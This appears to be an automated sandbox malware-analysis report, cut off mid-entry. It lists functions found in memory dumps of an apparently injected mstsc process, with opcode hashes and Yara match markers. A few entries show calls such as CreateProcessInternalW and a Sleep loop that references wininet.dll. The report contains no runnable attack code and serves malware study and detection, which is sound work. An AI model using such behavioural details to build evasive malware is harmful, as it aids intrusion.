                                                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                                                    Function 0229FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                                    Function 0229FB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                                                    Function 0229FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                                                    Function 0229F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                                    Function 0229F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                                    Function 0229FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                    Function 0229FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                    Function 0229FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                    Function 0229FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                    Function 0229FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                                    Function 0009A673 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58memoryprocessCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 402 9a673-9a674 403 9a61f-9a631 RtlAllocateHeap 402->403 404 9a676-9a67c 402->404 405 9a67e 404->405 406 9a6b6-9a6ca call 9af30 404->406 405->406 408 9a6cf-9a708 CreateProcessInternalW 406->408
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A62D
                                                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A704
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateCreateHeapInternalProcess
                                                                                                                                                                                    • String ID: 6E
                                                                                                                                                                                    • API String ID: 2739015735-729105364
                                                                                                                                                                                    • Opcode ID: 4713b156c88ead8abd4213c13b31e1c70b6fec864699777347c940a6c4da8641
                                                                                                                                                                                    • Instruction ID: 2303c34f091367c70a8d321dda5e5c5274b6fcc0b7fa89699ae2462e1a52504d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4713b156c88ead8abd4213c13b31e1c70b6fec864699777347c940a6c4da8641
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E1105B6314108ABCB18DF88DC80DEB77A9AF8C354F158259FA0DD3241C630E851CBA1
                                                                                                                                                                                    Function 00099050 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 426 99050-9907f 427 9908b-99092 426->427 428 99086 call 9bd10 426->428 429 99098-990e8 call 9bde0 call 8acf0 call 94e50 427->429 430 9916c-99172 427->430 428->427 437 990f0-99101 Sleep 429->437 438 99103-99109 437->438 439 99166-9916a 437->439 440 9910b-99131 call 98c70 438->440 441 99133-99153 438->441 439->430 439->437 442 99159-9915c 440->442 441->442 443 99154 call 98e80 441->443 442->439 443->442
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000990F8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                                                    • Opcode ID: b3cc6ede37a4df4b243a9bd53cd8c514ab83cf967673df995bf4a9057cdcbca4
                                                                                                                                                                                    • Instruction ID: c38bd653bb9034a27e487ae66f9c4eb83f8689e95705c0bfb04ba96cc2d3701c
                                                                                                                                                                                    • Opcode Fuzzy Hash: b3cc6ede37a4df4b243a9bd53cd8c514ab83cf967673df995bf4a9057cdcbca4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E3184B2500745BBCB24DF68C885FA7B7F8FB48B00F10811DF62A5B246DA70B650DBA5
                                                                                                                                                                                    Function 00099046 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 446 99046-99092 call 9bd10 449 99098-990e8 call 9bde0 call 8acf0 call 94e50 446->449 450 9916c-99172 446->450 457 990f0-99101 Sleep 449->457 458 99103-99109 457->458 459 99166-9916a 457->459 460 9910b-99131 call 98c70 458->460 461 99133-99153 458->461 459->450 459->457 462 99159-9915c 460->462 461->462 463 99154 call 98e80 461->463 462->459 463->462
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000990F8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                                                    • Opcode ID: 704c5e09ade98d2c29c28be02c6912d81491b4043571203d16c448f2bae5fa6e
                                                                                                                                                                                    • Instruction ID: 44b991115a7c7a29fe530dc1b18b37f51ce510e70c27e402798e914bced026d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 704c5e09ade98d2c29c28be02c6912d81491b4043571203d16c448f2bae5fa6e
                                                                                                                                                                                    • Instruction Fuzzy Hash: D121B4B1900241AFCB24DF68C885FABBBB4FB48B00F10811DF62D5B246D775A551DBA5
                                                                                                                                                                                    Function 0009A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 578 9a600-9a631 call 9af30 RtlAllocateHeap
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A62D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID: 6E
                                                                                                                                                                                    • API String ID: 1279760036-729105364
                                                                                                                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                    • Instruction ID: 1b6272288ef8ffb966947971173dd818e9710902374bf855a6b004b64de9da32
                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                    • Instruction Fuzzy Hash: 40E012B2210208ABDB14EF99CC41EAB77ACAF88754F118559BA085B242CA30F9118AF0
                                                                                                                                                                                    Function 0009A640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A66D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
